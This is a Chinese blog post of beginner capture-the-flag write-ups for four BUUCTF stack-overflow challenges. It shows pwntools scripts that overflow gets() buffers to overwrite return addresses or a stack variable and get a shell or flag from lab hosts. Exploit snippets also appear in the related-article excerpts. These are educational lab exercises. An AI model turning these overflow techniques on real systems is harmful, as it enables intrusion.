buu pwn入门 有栈溢出

最新推荐文章于 2024-01-31 21:33:25 发布
最新推荐文章于 2024-01-31 21:33:25 发布
阅读量603 收藏 1
点赞数 4
文章标签: 经验分享 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sanntaa/article/details/128125116
版权

首先说下栈溢出
要点是覆盖返回地址,改变程序的执行流.
在这里插入图片描述

1.test_your_nc1

提供俩方法
1.直接nc
首先把文件放ida里看下主函数
在这里插入图片描述里面有system函数可以用直接获取shell权限还有sh命令
再checksec看下文件有没有保护机制
在这里插入图片描述啥都没有
那就进靶机里ls
在这里插入图片描述有flag,再cat flag 就ok
在这里插入图片描述

2.rip1

这题是直接覆盖返回地址获取shell权限
先给文件checksec看下里面有保护机制没
在这里插入图片描述
啥都没有
然后给他拖ida里,看main函数
在这里插入图片描述里面有gets函数,gets函数不限制肯定会栈溢出的啊,再一看左边栏有后门函数fun(),找到fun()函数地址写脚本直接获取shell权限
在这里插入图片描述

exp

from pwn import *
p = remote('node4.buuoj.cn', 27891)
sanntaa = b'a' * 15 + p64(0x401186)
p.sendline(sanntaa)
p.interactive()
3.warmup_csaw_2016

这题直接给flag是
先看看有啥保护机制,啥都没有
在这里插入图片描述

ida main函数

在这里插入图片描述
gets函数溢出,覆盖返回地址
双击sub_40060D
在这里插入图片描述
cat flag.txt
看下sub_40060D的代码
在这里插入图片描述
如果调用,直接出flag了
在这里插入图片描述
r是返回地址
在这里插入图片描述应该偏移72位即0x48

exp

from pwn import *
p = remote('node4.buuoj.cn', 28539)
payload = b'a' * 0x48 + p64(0x40060D)
p.sendline(payload)
p.interactive()

在这里插入图片描述

4. ciscn_2019_n_1

checksec一下
在这里插入图片描述
这个NX enabled 启用了数据执行防护,我们不能在堆栈中执行代码
ida main函数
在这里插入图片描述func函数

在这里插入图片描述
所以就要让v2==11.28125就行
有gets()函数,你知道我要说什么
位置偏移
由上可知,v1[44] [rbp-30h],v2 [rbp-4h],相差30h-4h即v1就是这个差值
然后因为p64里面要用16进制,把小数转一下就ok
exp

from pwn import *
p = remote('node4.buuoj.cn', "25657")
payload = b'a' * (0x30 - 0x4) + p64(0x41348000)
p.sendline(payload)
p.interactive()

在这里插入图片描述

Sanntaa
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
POSN:POSN-BUU的源代码
04-01
在POSN-BUU的源码中,可能会有`try-catch`语句块来确保程序在遇到异常情况时能正常退出或恢复。 4. **多线程与并发**:考虑到定位服务可能需要处理来自多个传感器的数据,源代码可能包含了多线程编程,使用`std::...
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1031
buuctf pwn
linux kernel pwn 常用结构体
sky123博客
05-28 1615
tty 设备在/dev下的一个伪终端设备ptmx。
buuctf习题pwn(2~10)
yw__y的博客
03-30 942
test_your_nc1 PWN
Rrolin的博客
11-13 455
通过在网上寻找博客得知,文件是提供了一份程序代码,其中红色部分表示出,该程序没有任何的保护手段,所以可以直接得。题目给了一个地址一个文件,这里我尝试去连接。结果直接就得到了flag!但是给的文件总归是要有用的。
Pwn | CTF】BUUCTF test_your_nc1
weixin_46301214的博客
01-31 642
nc命令是一个用于网络通信的命令行工具,全称为netcat。以上是nc命令的一些常用用法和参数,需要注意的是,nc命令在不同的操作系统上可能会有一些差异。还记得我以前第一次做pwn题目的时候,是真的懵逼,连接上之后没反应。这题直接连接就可以了,windows装了nc工具,直接耍。这里光标去了下一行,是已经连接上,在等你输入命令呢。下面给一点nc命令的解释,文心一言得出来的。天命:时隔两年,又杀回了pwn这里。然后正常查看 flag 文件就行了。拿到题目的提示,测试你的nc工具。
西华大学网络安全实验室入门指南1
08-08
对于有一定编程基础的学员,可以尝试Re和Pwn。密码学需要扎实的数学基础,尤其是数论。学习资源包括Bugku、攻防世界和Buu平台,同时结合B站上的教学视频辅助理解。 对于招新赛的学习策略,首先要了解各个方向的基本...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
最新发布
05-26
BUU-Reveser-XMAN2018排位赛_easywasm(WebAssembly逆向分析)
BUU刷题-Pwn-bjdctf_2020_babystack
一个啥也不会的小菜鸡!
06-21 186
首先利用&nbytes变量控制溢出长度,再使用buf实现溢出就可以了。后门函数地址:backdoor:0x4006E6。
buu_pwn
王富贵同学的博客
09-29 1997
warmup_csaw_2016 明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d
BUU-pwn(二)
qq_53263789的博客
04-27 306
ciscn_2019_n_8 32位程序,逻辑很简单 需要var[13] == 17 需要注意的是qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节 所以用p64 exp from pwn import * r = remote('node4.buuoj.cn',29396) payload = b'aaaa'*13+p64(0x11) r.sendline(p
BUU PWN(一)
playmaker的博客
01-28 2092
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
BUUCTF PWN test_your_nc
Ethan552525的博客
08-09 983
题目: 解题: 1:用IDA打开test 用file命令查看文件test为64位。 用IDA pro (64-bit)打开: 2:用netcat连接 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。 它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。 使用它你可以轻易的建立任何连接。 ...
pwn(2) 愚人发现了pwn的有趣之处 对于填充大小的研究
brightendavid的博客
05-09 263
#python3 from pwn import * p = remote('node3.buuoj.cn', '25822') payload = b'b' * (0x40+8)+ p64(0x40060D) p.sendline(payload) p.interactive() 抄了几个wp,一直很奇怪为什么这个填充的字符数量为什么规则不一样。 比如上面的填充规则是输入的字符大小+EBP大小 因为是64位的系统所以EBP大小是8,而前面的0x40是64位,也就是此处输入的字符大小。 后面
BUUCTF之pwn题解(一些栈题+程序分析)
热门推荐
swedsn
01-13 1万+
文章目录前言一、test_your_nc二、rip2.读入数据总结 前言 萌新的总结(包含当时做题的全过程),方便以后查看。有什么不对的望各位大佬指点。 一、test_your_nc 1.直接ncnc+的ip+端口号)。这里是直接进入了对方的shell命令中(有些题目是直接进入对方的文件并不会进入对方的shell中)。接下来就是和操作自己的shell一样的,ls查看目录,cat查看文件flag。 相互连接 二、rip 1使用IDA打开文件,先找main函数,然后按F5查看伪代码。看wp说fun可疑,点进
buupwn1_sctf_2016
xieyichensss的博客
03-18 711
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
BUU PWN (二)
playmaker的博客
02-07 821
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
buu cipher
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值